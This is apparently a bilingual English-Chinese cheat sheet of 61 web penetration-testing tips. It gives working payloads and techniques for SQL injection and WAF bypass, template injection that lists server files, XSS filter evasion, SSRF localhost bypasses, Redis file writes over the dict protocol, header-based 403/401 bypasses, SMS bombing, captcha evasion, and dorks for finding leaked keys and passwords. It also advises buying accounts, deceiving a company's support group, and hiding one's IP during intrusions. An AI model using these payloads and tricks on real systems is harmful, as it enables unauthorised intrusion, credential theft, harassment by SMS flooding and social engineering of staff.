1. If it prompts that parameters are missing, such as {msg: params error}, try to use dictionary fuzzing to construct parameters for further attack.
2. The program overflows, the maximum value of int is 2147483647, you can try to use this value for integer overflow, and observe the phenomenon.
3. Don't be discouraged by 403, 404 responses, try to use tools such as dirsearch to detect directories.
4. Simple bypass of verification code: reuse, universal verification code (0000, 8888), empty verification code, verification code can be identified (can be identified by PKAV HTTP Fuzzer tool, etc.)
5. SMS bombing bypass: adding +86 before the mobile phone number may bypass it. Enter the mobile phone number into the mailbox, and enter the mobile phone number in the mailbox
6. If the verification code is effective, you can try to send the verification code repeatedly for a period of time. Because it is effective, the duration of the verification code may be extended.
7. When SQL injection, if the database is Mysql, you can try to use && to replace and, such as: ' && '1'='1,' %26%26 '1'='1.
8. When SQL injection, if the database is Mysql, waf filters =, you can try to use like instead. Such as: and 1 like 1
9. The JWT format can be decrypted at jwt.calebb.net/. The premise is to know the secret key. You can try to construct any data to see if there will be an error message carrying the secret key information. You can use github.com/firebase/php Generate JWTs.
JWT format header.payload.signature
10. If the redis service (port 1234) is opened, you can try to use the /actuator/redis/info statement to see if you can read sensitive information, such as: xxx.com:1234/actuator/r
11. Gitlab platform vulnerability - CVE-2020-10977
12. At the API interface, you can construct parameters by yourself, pass parameters in the form of POST, and try to construct them in JSON format. Remember to add content-type: application/json, some tryable parameters, page, size, id.
13. If the mobile phone has a time limit for sending text messages, you can try to use special characters or spaces before the mobile phone number.
His logic should be like this, the user enters the mobile phone number --> the backend judges whether the mobile phone number has been requested within 30 seconds or 60 seconds --> if not, judge whether the sent mobile phone number is pure enough for 11 digits number
If not, remove the non-numeric characters --> compare with the mobile phone number in the database, it is enough to exist in the database, and if it exists, send a verification code to the mobile phone.
14. The picture verification code can be set to empty, such as: code=undefined
15. Automatically use the content of the verification code to observe whether there is any content sent to the user in the cookie and parameters, you can try to change it, and you can construct a phishing link.
16. Template injection, command parameters entered in {{xxx}} can be executed, such as:
www.baidu.com/{
{1+1}}
以Python为例,列出当前目录下所有文件的Payload:{
{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
17. For information collection, select WeChat in Sogou search to search for the assets of related official accounts of related companies.
18. Search the keyword API, Swagger UI, etc. in the JS file, and try to find the API interface address.
19. Common path of swagger interface:
/swagger/
/api/swagger/
/swagger/ui/
/api/swagger/ui/
/swagger-ui.html/
/api/swagger-ui.html/
/user/swagger-ui.html/
/swagger/ui/
/api/swagger/ui/
/libs/swaggerui/
/api/swaggerui/
/swagger-resources/configuration/ui/
/swagger-resources/configuration/security/
20. Swagger component feature fixed title: Swagger UI
21. Blindly test whether the directory exists, if the directory exists, it may be automatically added/completed at the end of the URL.
22. The blank characters that can be used in Mysql are: %09, %0a, %0b, %0c, %0d, %20, %a0
23. Account acquisition: library, QQ group, github leak, borrow/rent/buy account.
24. If Alibaba Cloud's AKSK is leaked, you can use the AKSKtools tool to further exploit it.
xz.aliyun.com/t/842925. If you encounter a background page that flashes past and then asks you to log in, usually the authority authentication method is used, you can use the following methods to bypass it, or if you encounter 401, 403, 302, you can try the following methods:
一、GET /xxx HTTP/1.1 à403
Host: test.com
绕过:
GET /xxx HTTP/1.1 à200
Host: test.com
X-Original-URL: /xxx
二、GET /xxx HTTP/1.1 à403
Host: test.com
绕过:
GET /xxx HTTP/1.1 à200
Host: test.com
Referer: http://test.com/xxx
三、302跳转:拦截并drop跳转的数据包,使其停留在当前页面。
四、前端验证:只需要删掉对应的遮挡模块,或者是验证模块的前端代码。
26. A tool for generating gopher protocol payload:
https://github.com/firebroo/sec_tools
27. Dict protocol writing process:
1.写入内容;
dict://127.0.0.1:6379/set❌test
2.设置保存路径;
dict://127.0.0.1:6379/config:set:dir:/tmp/
3.设置保存文件名;
dict://127.0.0.1:6379/config:set:dbfilename:1.png
4.保存。
dict://127.0.0.1:6379/save
28. CentOS 7 system uses suid to escalate rights to obtain Root Shell
https://www.freebuf.com/articles/system/244627.html
29. The payload used by tags in xss:
<a href=javascript:alert(1)>xx</a>
30. XSS filters single quotes, and the equal sign can:
①、使用:String.fromCharCode(97,108,101,114,116,40,49,41);
为alert(1),该方法输出的结果为字符串,可以使用eval()进行执行,即弹框操作
eval(String.fromCharCode(97,108,101,114,116,40,49,41));
②、atob函数:
eval(atob`YWxlcnQoMSk=`) 为 eval(atob`alert(1)`) 其中`为反引号
31. XSS filters single quotes, equal signs and parentheses, eval:
①、过滤了eval函数可以用其他函数去绕过,如:Function,constructor
Function`a${atob`YWxlcnQoMSk=`}```
``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```
32. You can use the following command to check whether you are in the docker virtual machine
cat /proc/1/cgroup
33. Try the universal password'=0#34. CORS vulnerability verification, you can use curl to verify:
curl https://www.xxxx.com -H "Origin: https://test.com" -I
检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com
35. When blindly testing whether the target system is Shiro, you can manually construct rememebrMe=xxx in the cookie
If there is rememberMe=deleteMe in the Set-Cookie in the returned package, it proves that the system uses Shiro, so it can be further attacked.
36. Use regular expressions to obtain other URLs contained in the website:
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
37. For some common remote command execution (RCE) parameters, please see the RCE-extentions.txt file in the dicts directory for details.
38. Several small methods to bypass SSRF protection:
A、绕过SSRF限制通过CIDR,如:
http://127.127.127.127
http://127.0.0.0
B、不完整的地址,如:
http://127.1
http://0
C、将地址结合在通过特殊字符结合在一起,如:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib : 3.3.3.3
D、绕过解析器,如:
http://127.1.1.1:80\@127.2.2.2:80/
E、绕过localhost通过[::],如:
http://[::]:80/
http://0000::1:80/
39. Several commonly used Google grammars:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
40. Compare the two associated websites through the hash of the favicon:
脚本地址:https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py
命令:python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
41. Some local parameters are included. For details, please refer to the LFI-extentions.txt file in the dicts directory.
42. You can find some hidden GET parameters in JavaScript files, such as:
首先,在js文件中找到一些变量,比如:var test="xss"
然后,可以尝试使用GET方法构造每一个参数,比如:
https://example.com/?test=”xsstest
本方法可能会发现一些XSS
43. Use github dorks to help us find some sensitive information, such as:
extension:pem private
extension:ppk private
extension:sql mysql dump password
extension:json api.forecast.io
extension:json mongolab.com
extension:yaml mongolab.com
extension:ica [WFClient] Password=
extension:avastlic “support.avast.com”
extension:js jsforce conn.login
extension:json googleusercontent client_secret
“target.com” send_keys
“target.com” password
“target.com” api_key
“target.com” apikey
“target.com” jira_password
“target.com” root_password
“target.com” access_token
“target.com” config
“target.com” client_secret
“target.com” user auth
通过上述语法,可以搜索到一些敏感的私钥,一些SSH登录私钥,mysql的数据库密码,API key等等。
另外推荐一个脚本:https://github.com/techgaun/github-dorks
44. For common parameters of SSRF, please refer to the SSRF-extensions.txt file in the dicts directory for details.
45. By adding the .json suffix, leak some sensitive information, such as:
一次正常请求:
GET /ResetPassword HTTP/1.1
{"email":"[email protected]"}
响应:
HTTP/1.1 200 OK
添加.json后缀的请求:
GET /ResetPassword.json HTTP/1.1
{"email":"[email protected]"}
响应:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
原链接:https://twitter.com/SalahHasoneh1/status/1293918353971531776
46. If the response is 401, try adding X-Custom-IP-Authorization: 127.0.0.1 to the request header
47. As for the website that logs in to the background, if there is a password reset function but it is disabled, you can find the company’s technical qq group, pretend that the user has forgotten the password, ask for a reset password, let the function be activated, and verify whether there is any password Reset bugs.
48. If you encounter a background page that flashes past and then asks you to log in, you usually use the authority authentication method:
49, 302 jump: intercept and drop the redirected data packet, so that it stays on the current page.
This operation is unsuccessful every time, but you can modify the returned 302 to 200, and then delete the Location field.
50. Download any file: /porc/self/cmdline --cmdline parameter of the current process, /var/lib/mlocate/mlocate.db --full file path.
51. Several business scenarios and bypass methods that are prone to SMS bombing:
①:登录处
②:注册处
③:找回密码处
④:绑定处
⑤:活动领取处
⑥:独特功能处
⑦:反馈处
一般绕过限制方法:
手机号码前后加空格,86,086,0086,+86,0,00,/r,/n, 以及特殊符号等
修改cookie,变量,返回
138888888889 12位经过短信网关取前11位,导致短信轰炸
52. When injecting, you can try --%0a union --%0a select to try to bypass.
53. When injecting, read more about order by, group by, {$var}.
54. Adding some + before the mobile phone number will cause SMS bombing.
55. If you find that the SMS verification code appears in the response in the side station, you can try whether the verification code in the main station or other stations is common.
56. When obtaining the SMS verification code, separate the two mobile phone numbers with a comma. It is possible that the two mobile phone numbers can obtain the same verification code.
57. Test injection and ord(0x1)->true, and ord(0x0)->false.
58. When encountering file reading vulnerabilities, in addition to reading configuration files, you can also try to read website files to conduct code audits. Maybe there are loopholes in the source code due to negligent development.
59. Use python to quickly open the http server:
基于python2.x,命令如下:
python -m SimpleHTTPServer 8000
# 在当前目录起个 8000 端口的 HTTP 服务
基于python3.x,命令如下:
python -m http.server 8000
60. Try not to expose your IP address when infiltrating, it is necessary to hang a proxy.
If you want to check whether your terminal uses a proxy under linux, you can check the returned IP address at curlifconfig.me/.
Windows can directly visit ifconfig.me/
61. When organizing dictionaries, it is recommended to use tools under Linux to quickly merge and deduplicate.
cat file1.txt file2.txt fileN.txt > out.txt
sort out.txt | uniq > out2.txt